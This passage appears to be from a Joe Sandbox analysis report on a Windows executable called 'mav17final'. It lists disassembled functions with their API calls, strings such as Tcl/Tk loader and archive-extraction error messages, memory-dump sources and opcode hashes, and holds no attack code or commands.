                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: gfffffff
                                                  • API String ID: 3215553584-1523873471
                                                  • Opcode ID: 356f030ed7b35362b5f501750a10a67b28f658ed90bf6c8e393e6e46cd14dcf3
                                                  • Instruction ID: 15679eb6f9f65c01b33cc69a920f3b62bce4b1eeae50af348b43e3ac95419f1e
                                                  • Opcode Fuzzy Hash: 356f030ed7b35362b5f501750a10a67b28f658ed90bf6c8e393e6e46cd14dcf3
                                                  • Instruction Fuzzy Hash: 0E915963B083C64AEB25DB369480BBDAB91EB54B80F458132CE5D4B7A1DE3DE502C731
                                                  Function 00007FF79EA5A358 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA5A38E
                                                    • Part of subcall function 00007FF79EA567E8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79EA567C5), ref: 00007FF79EA567F1
                                                    • Part of subcall function 00007FF79EA567E8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79EA567C5), ref: 00007FF79EA56816
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                  • String ID: -
                                                  • API String ID: 4036615347-2547889144
                                                  • Opcode ID: b729e8a8977ceecfd89cae93a3c6693c94b4856ac56d175175c079b617730af7
                                                  • Instruction ID: 5726c52c79ac9d72589c194e66bb117af71d9ce3586e37e65e0d2bcc77c8012c
                                                  • Opcode Fuzzy Hash: b729e8a8977ceecfd89cae93a3c6693c94b4856ac56d175175c079b617730af7
                                                  • Instruction Fuzzy Hash: BC91F462B0878586EB70AB359484B7DF6A1FB55BD4F844235EA9D03BA9CF3CE4008720
                                                  Function 00007FF79EA650A8 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise_clrfp
                                                  • String ID:
                                                  • API String ID: 15204871-0
                                                  • Opcode ID: ee517001d8d727e3896e11593ea3394e885c1995f059104ed8e3c6087952abb0
                                                  • Instruction ID: c673372fb3d5671630e15dfd0428f0a594f2b96a95027b9ac0f98356366583f1
                                                  • Opcode Fuzzy Hash: ee517001d8d727e3896e11593ea3394e885c1995f059104ed8e3c6087952abb0
                                                  • Instruction Fuzzy Hash: E7B17A73A00B848BEB29DF39C88A66C77A0F785F48F548921DA6D877B4CB39D451C720
                                                  Function 00007FF79EA61F30 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 474895018-0
                                                  • Opcode ID: 3044ee37cc60d3eaf114ce5aaa27a3a7d66fe6401853c1350ed690cc36e8da8f
                                                  • Instruction ID: 03fd423d6db8c2af5409629a7c707a85e79328d6286557e16f4ba79b6c22a875
                                                  • Opcode Fuzzy Hash: 3044ee37cc60d3eaf114ce5aaa27a3a7d66fe6401853c1350ed690cc36e8da8f
                                                  • Instruction Fuzzy Hash: 0C71E332F0CA4246FB746B3884C0E7DE291EB5AB60F950635DB5D866F1DE7DE8818630
                                                  Function 00007FF79EA4FDFC Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: 392d87230a2f82bcc593fcf95495bab5ad40d3b97372ce6e23882fac41bb142b
                                                  • Instruction ID: f4bd3d4d8873b42c47f349b7b572bf0a42b4a215669f0dec4271fca389b59afa
                                                  • Opcode Fuzzy Hash: 392d87230a2f82bcc593fcf95495bab5ad40d3b97372ce6e23882fac41bb142b
                                                  • Instruction Fuzzy Hash: 1971A22AA2824282E678BB3950D0DBDA2D1FF42744FC47032DD49476B9EF2DE8438735
                                                  Function 00007FF79EA542E8 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: TMP
                                                  • API String ID: 3215553584-3125297090
                                                  • Opcode ID: 68220cee06eb1e49efdf68a7441363e76f193eaf92f3418bfe4dc13cbeb80bd7
                                                  • Instruction ID: 158831340b116bcd7a9e427636df67df4769bc02f768af6465cde99cbd4531a2
                                                  • Opcode Fuzzy Hash: 68220cee06eb1e49efdf68a7441363e76f193eaf92f3418bfe4dc13cbeb80bd7
                                                  • Instruction Fuzzy Hash: 1D618115B1C65241FA78BB366981A7ED2A2EF84BD4FC84035DE0E477B6DE3CE4468230
                                                  Function 00007FF79EA4FB94 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: 537ccdf0245c343026de8cdba38534bbf0df83feeead17a75e0001d00461fa3c
                                                  • Instruction ID: f2f324eba78cfd75f355c1c318e01d34f2068b2e7432ec59d8920c79ba61f22e
                                                  • Opcode Fuzzy Hash: 537ccdf0245c343026de8cdba38534bbf0df83feeead17a75e0001d00461fa3c
                                                  • Instruction Fuzzy Hash: 1161D019A0C24646FAB86B395080FBA9B91FF41748FD43131DD88172F9EE2DE8428775
                                                  Function 00007FF79EA5EE60 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 0f61f16ebaa8a638a8a5e8d26b1d50f56c630599b3bc81483cd24e756a2acb9f
                                                  • Instruction ID: 6d291ef24f3072da2865daa0b2d7eafd307d8ff410d6eb3a9d535cb8d2c752c2
                                                  • Opcode Fuzzy Hash: 0f61f16ebaa8a638a8a5e8d26b1d50f56c630599b3bc81483cd24e756a2acb9f
                                                  • Instruction Fuzzy Hash: 42B09220E07A82C6EA187B216CC662462A4BF88B01FD44038C10C42330DE2C20B54770
                                                  Function 00007FF79EA48ED0 Relevance: .3, Instructions: 287COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de6771c1ef7e18c63946eeffa30aa9c1aaeeae17eb273b3e56296a943eb9139a
                                                  • Instruction ID: b809e26c95ad4355565e9af1f52dc3f7e75678f685883f636736f126d40dd63e
                                                  • Opcode Fuzzy Hash: de6771c1ef7e18c63946eeffa30aa9c1aaeeae17eb273b3e56296a943eb9139a
                                                  • Instruction Fuzzy Hash: 50C1F3332141E08BD699EB29E4994BA73E2F7C830DBC5802AEB87577C5CA7DE014D760
                                                  Function 00007FF79EA51E10 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                  • Instruction ID: 52cdbf32910b75184ec613044198aa8b5e4500182a87d93ef2e935cb2e9d6a36
                                                  • Opcode Fuzzy Hash: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                  • Instruction Fuzzy Hash: 8F41A752C0DE4A44E9B56B380544EBC96C1DF73BA4FE852B5DD9A133E3DE0C258AC230
                                                  Function 00007FF79EA55EE0 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LanguagesPreferredRestoreThread
                                                  • String ID:
                                                  • API String ID: 1765668137-0
                                                  • Opcode ID: f40c359668217bfda64651ce9563db73d1d2d17d2c05805d259380fe19d81844
                                                  • Instruction ID: 31d50da03a0a21be74f48c2f61dd9141ff57588e212d8b62d8d2817114f61466
                                                  • Opcode Fuzzy Hash: f40c359668217bfda64651ce9563db73d1d2d17d2c05805d259380fe19d81844
                                                  • Instruction Fuzzy Hash: 3041E522B14A5482EF64DF3AD9549BDB3A1E748FD4B499032DE0D87B64DF3CC1468320
                                                  Function 00007FF79EA64EF0 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3c8e6567a7fd7a5e5e3fd4f052162ecb8691576fce2ca6d2820fff9d11d7845
                                                  • Instruction ID: eba4052748a1d606b6c3e06d902baac880c843c0c8fdd60836f95a4b71ebeb66
                                                  • Opcode Fuzzy Hash: a3c8e6567a7fd7a5e5e3fd4f052162ecb8691576fce2ca6d2820fff9d11d7845
                                                  • Instruction Fuzzy Hash: 50F06871B196958ADBA4EF79A442A3A77D4F748780F808039D68D83B24D63D90508F64
                                                  Function 00007FF79EA4C690 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81c82eb9e1999025efe10c98d3b89d171b57a40d8cb2ac496cbfc14c448416f8
                                                  • Instruction ID: 0a152b48e9e6cd5d4ec0bd57b3c45c82704ad71f9cb96ecd72a85c007800cfc0
                                                  • Opcode Fuzzy Hash: 81c82eb9e1999025efe10c98d3b89d171b57a40d8cb2ac496cbfc14c448416f8
                                                  • Instruction Fuzzy Hash: F7A0022194CC02E9F6A4AF20E8D0830E330FB92B01BC06071D00E420B1AF7DE540D330
                                                  Function 00007FF79EA46DF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                  • API String ID: 190572456-2208601799
                                                  • Opcode ID: 54a1c3e252e67cc09266da1fcf279fad4bf4e331cc46ad4e59887307f45e8b9e
                                                  • Instruction ID: 364a580e1d126c2b107c8a3cfec76e34b6e0d614a8eb40a24b173871a4e085ea
                                                  • Opcode Fuzzy Hash: 54a1c3e252e67cc09266da1fcf279fad4bf4e331cc46ad4e59887307f45e8b9e
                                                  • Instruction Fuzzy Hash: 0CE1B764A49F03A4EE79EB35E8D0974A7AAEF46B94BC55035D80D063B4FF7CA5488330
                                                  Function 00007FF79EA412B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message_fread_nolock
                                                  • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                  • API String ID: 3065259568-2316137593
                                                  • Opcode ID: 0732d4f022fdc7b31db21be6e5e496bbcf735fc263b6977c6db525ed3c6819a5
                                                  • Instruction ID: 031ee249d27fb274957e473acb151257f8f9913a50bbe55911c628899df2d102
                                                  • Opcode Fuzzy Hash: 0732d4f022fdc7b31db21be6e5e496bbcf735fc263b6977c6db525ed3c6819a5
                                                  • Instruction Fuzzy Hash: 0C519161B0868745EA30B731A8D1AFAA394EFA5784FC04431EE4D47BA6FE7CE5458330
                                                  Function 00007FF79EA423F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                  • String ID: P%
                                                  • API String ID: 2147705588-2959514604
                                                  • Opcode ID: 1397bf4d49756997acb3fe1c6f5b4c017e2c7a9ff894d6d872dd8574e3b9b785
                                                  • Instruction ID: cc9a86e2af50a310ecf8c64fd9bf2d627800ac31d31a97163ac5cc56799f5e64
                                                  • Opcode Fuzzy Hash: 1397bf4d49756997acb3fe1c6f5b4c017e2c7a9ff894d6d872dd8574e3b9b785
                                                  • Instruction Fuzzy Hash: FD51E826614BA186D634AF36A0585BAF7A1FB98F61F404125EFCE43664DF3CD085DB30
                                                  Function 00007FF79EA415A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                  • API String ID: 2030045667-3659356012
                                                  • Opcode ID: 2a5e912accda7a64c0510487fb720770bbefb5a6dcc6c5f22fe97e2fa0bec6cc
                                                  • Instruction ID: 4f58908494786d8af6c64bd67ea767d5d553df630d1428faab027a7ba9aa9ba2
                                                  • Opcode Fuzzy Hash: 2a5e912accda7a64c0510487fb720770bbefb5a6dcc6c5f22fe97e2fa0bec6cc
                                                  • Instruction Fuzzy Hash: 9F314221B1C64346EA34BB71A4809BAE3A1EF65BD4FD84431DE4D07A66FE3CE5458730
                                                  Function 00007FF79EA485B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA4864F
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA4869F
                                                  Strings
                                                  Memory Dump Source
